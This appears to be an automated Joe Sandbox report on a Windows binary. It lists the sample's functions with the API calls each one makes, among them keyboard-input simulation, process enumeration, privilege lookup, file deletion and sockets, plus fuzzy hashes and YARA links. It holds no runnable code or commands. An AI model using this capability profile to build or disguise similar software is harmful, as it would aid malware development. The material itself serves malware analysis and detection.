Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
Instruction ID: 38e86e68464498fa2867b9f173dca789d827fcc89b40aa2e2da876e84ed40fd0
Opcode Fuzzy Hash: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
Instruction Fuzzy Hash: 3D813971A00109EFCB44DF94C888EEEB7B9FF89315F20855CE516AB250DB75AE06CB61

Function 007C749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007C74AC
SysAllocString.OLEAUT32(00000000), ref: 007C7555
VariantCopy.OLEAUT32 ref: 007C7584
VariantClear.OLEAUT32(?), ref: 007C75AB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 02ef66658a6465717dfbc5a01256f3821ce4bafe39ff7f4620292d51ac3cda61
Instruction ID: 6bf604dd1c1721854cf71ef40a147b87327eb3f2cd097511c39f48162fe2e531
Opcode Fuzzy Hash: 02ef66658a6465717dfbc5a01256f3821ce4bafe39ff7f4620292d51ac3cda61
Instruction Fuzzy Hash: E1519630608B01DADB289F79D899F2DB7E5AF44350F20981FE556DB2A2EF789840CF15

Function 007EF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007EF526
Process32FirstW.KERNEL32(00000000,?), ref: 007EF534

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Process32NextW.KERNEL32(00000000,?), ref: 007EF5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF603

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
Instruction ID: 679d4d9b84fae71abb345d24d293b315d43795cdbec32158eb7ad356a02de0e7
Opcode Fuzzy Hash: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
Instruction Fuzzy Hash: 9E518CB1104350EFD720EF24D88AE6BB7E8FF98740F40492DF595972A1EB74A905CB92

Function 007F9E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007F9E88
ScreenToClient.USER32(00000002,00000002), ref: 007F9EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007F9F28

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8f3633b54881ce7e54f376a10bf46c4a0c284a57744b5aeb0a7147fad1b0e320
Instruction ID: 909de08bb6aad657d39f2c4589452d5bec5472c580e179990b757d6e172a2b59
Opcode Fuzzy Hash: 8f3633b54881ce7e54f376a10bf46c4a0c284a57744b5aeb0a7147fad1b0e320
Instruction Fuzzy Hash: 07511A75A00209EFCB20DF54C884ABA7BB6FB94360F108569FA65D7390D735AD51CB90

Function 0079492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007949C0
__flush.LIBCMT ref: 007949E0
__write.LIBCMT ref: 00794A13
__flsbuf.LIBCMT ref: 00794A41

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 374332d67bf968dd470128744807e6bddd3587abc3916c518d5d16611e0bbfdc
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 6041B531B00706ABDF288E69E884D6F77A6EF45360B24C27DE85587650EB78ED428B44

Function 007CA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007CA68A
__itow.LIBCMT ref: 007CA6BB

Part of subcall function 007CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007CA976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 007CA724
__itow.LIBCMT ref: 007CA77B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 34d42b7b6d2d63641e7a38841008001cd5e7bea35a5d60cce342636b125e2107
Instruction ID: 3d50ef3c217e30aa3c2a74854b38cf2a4a6bba96eb9ed5db4b403dd3ac604120
Opcode Fuzzy Hash: 34d42b7b6d2d63641e7a38841008001cd5e7bea35a5d60cce342636b125e2107
Instruction Fuzzy Hash: 99419E70A4020CABDF10EF54C84AFEE7BB9EF48755F44006DF905A3281DB789A45CBA2

Function 007E7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007E70BC
WSAGetLastError.WSOCK32(00000000), ref: 007E70CC

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E7130
WSAGetLastError.WSOCK32(00000000), ref: 007E713C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
Instruction ID: 5be08b5e75b51e4d42974ea1592303bccfdd89d97ea2c01bc75c49931ad33bf5
Opcode Fuzzy Hash: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
Instruction Fuzzy Hash: FF41A071740200EFEB24AF24DC8AF2A77A4EB48B54F14C458FA599B3C2DB789C018B91

Function 007E6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00800980), ref: 007E6B92
_strlen.LIBCMT ref: 007E6BC4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 31e92ed946c392afb0e722ffd6d4b8c689e3c55b870b4e6df72099076a33bd17
Instruction ID: 14fe7995c5476f0ac637a27850c8c08175fa36dc24ae6d77e0ec607e9806ba31
Opcode Fuzzy Hash: 31e92ed946c392afb0e722ffd6d4b8c689e3c55b870b4e6df72099076a33bd17
Instruction Fuzzy Hash: A641D671601144EBCB04FB65DC99FBEB3A9EF68350F248155F91A97292DF38AD01CB60

Function 007DBE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007DBEE1
GetLastError.KERNEL32(?,00000000), ref: 007DBF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007DBF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007DBF58

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 45fa1f88aa21b5d30b100ec3f46c820d78df36bc6022358fd91fcbf3edbd1dd5
Instruction ID: 7a11774226e9777fd2fbbd334aaf73c021b4be8e804eae6cff1664011dbae3a9
Opcode Fuzzy Hash: 45fa1f88aa21b5d30b100ec3f46c820d78df36bc6022358fd91fcbf3edbd1dd5
Instruction Fuzzy Hash: 1C41E735600A10DFCB21EF15C589A59BBF1EF49360F19C489E9899B362CB38FD42DB91

Function 007F8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8F03

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
Instruction ID: 7aa7f90cf277ab344e28cd42b57090c28fb1e3d22f0dce39d220e5e1a4d6ac7d
Opcode Fuzzy Hash: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
Instruction Fuzzy Hash: AA31BC3061420DEEEFA09B18CC49BB837E6FB06320F144911FB51E63A1CF79EA509A52

Function 007FB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007FB1D2
GetWindowRect.USER32(?,?), ref: 007FB248
PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
MessageBeep.USER32(00000000), ref: 007FB2C9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
Instruction ID: a3d7a3666b1aff95d9999c1fe53e68f0ccd39e4ad14fccb7c9045daf91177ac8
Opcode Fuzzy Hash: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
Instruction Fuzzy Hash: 2C416A70A04219DFDB21CF98C884BAD7BF5FB89311F1485A9EA189B361D734E841DF50

Function 007D12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D1326
SetKeyboardState.USER32(00000080,?,00000001), ref: 007D1342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D13A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D13FA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
Instruction ID: 7bf1df79f5ea610c1d3e8cd0f576b6a2d597a388496665583bcaceb82ede4eb6
Opcode Fuzzy Hash: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
Instruction Fuzzy Hash: 60310770E40258BEFF348A658C09BFE7BB9AB45320F84421BE490627D1D37C89519BA1

Function 007D1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 007D1465
SetKeyboardState.USER32(00000080,?,00008000), ref: 007D1481
PostMessageW.USER32(00000000,00000101,00000000), ref: 007D14E0
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 007D1532

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
Instruction ID: da33f123ecaf165899e61500aa3b6a256b30bb0568d9b785c2acb072df800449
Opcode Fuzzy Hash: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
Instruction Fuzzy Hash: CA314E70E40298BEFF348A659C04BFABB75AB85310F88831BE491523D1C37C89559B61

Function 007A63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A642B
__isleadbyte_l.LIBCMT ref: 007A6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A64BD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
Instruction ID: 044d6566a71a918a6c151f423f5991fd6683d9214c3d250bc0594115c8ed8736
Opcode Fuzzy Hash: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
Instruction Fuzzy Hash: CE31C631604296EFDF218F75CC44BAA7BA5FF86310F194229F86487191EB39DA50DB50

Function 007F552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007F553F

Part of subcall function 007D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D3B4E
Part of subcall function 007D3B34: GetCurrentThreadId.KERNEL32 ref: 007D3B55
Part of subcall function 007D3B34: AttachThreadInput.USER32(00000000,?,007D55C0), ref: 007D3B5C

GetCaretPos.USER32(?), ref: 007F5550
ClientToScreen.USER32(00000000,?), ref: 007F558B
GetForegroundWindow.USER32 ref: 007F5591

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 56d9484335b99715d0fbf2c9997e0a3340dd0ef9753d2d089144ccb89afed5c4
Instruction ID: dd4b96c257f30f34b82de776565b68ff22b73f6e47a235f301e0b34afcf04fd1
Opcode Fuzzy Hash: 56d9484335b99715d0fbf2c9997e0a3340dd0ef9753d2d089144ccb89afed5c4
Instruction Fuzzy Hash: CD312F71A00108EFDB10EFA5C8859EEB7F9EF98304F10806AE515E7241DB79AE408FA0

Function 007FCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

GetCursorPos.USER32(?), ref: 007FCB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABCEC,?,?,?,?,?), ref: 007FCB8F
GetCursorPos.USER32(?), ref: 007FCBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABCEC,?,?,?), ref: 007FCC16

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
Instruction ID: 9aa79783933daa5869f5a9c35b0c62a7444d75abd20426d463979777d98633c1
Opcode Fuzzy Hash: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
Instruction Fuzzy Hash: 5131817950001CAFCB268F95CC59EBA7BB9FB89310F044099FA15A7361C7359D51EFA0

Function 00790BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00790BE2

Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065

_fprintf.LIBCMT ref: 00790C19
OutputDebugStringW.KERNEL32(?), ref: 007C694C

Part of subcall function 00794CCA: _flsall.LIBCMT ref: 00794CE3

__setmode.LIBCMT ref: 00790C4E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
Instruction ID: 6b6ab4fe93bf39f4572bf35453d3cd6aaa0a448404c919d2847dd6290d662ef4
Opcode Fuzzy Hash: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
Instruction Fuzzy Hash: 75110272A04208EEDF18B7A4BC4AEBE7B69EF42320F14015AF204962C2DF6D584247A1

Function 007C9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
Part of subcall function 007C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
Part of subcall function 007C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
Part of subcall function 007C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C92C1
_memcmp.LIBCMT ref: 007C92E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C931A
HeapFree.KERNEL32(00000000), ref: 007C9321

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
Instruction ID: 274cde1c7bed595763e193792cdfd2fea6aed3a95a6a5a5813555f0cb74f50cf
Opcode Fuzzy Hash: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
Instruction Fuzzy Hash: 43216632E40109EBDB50DFA4C949FEEB7B8FF44301F04405DE985AB291E778AA05CBA0

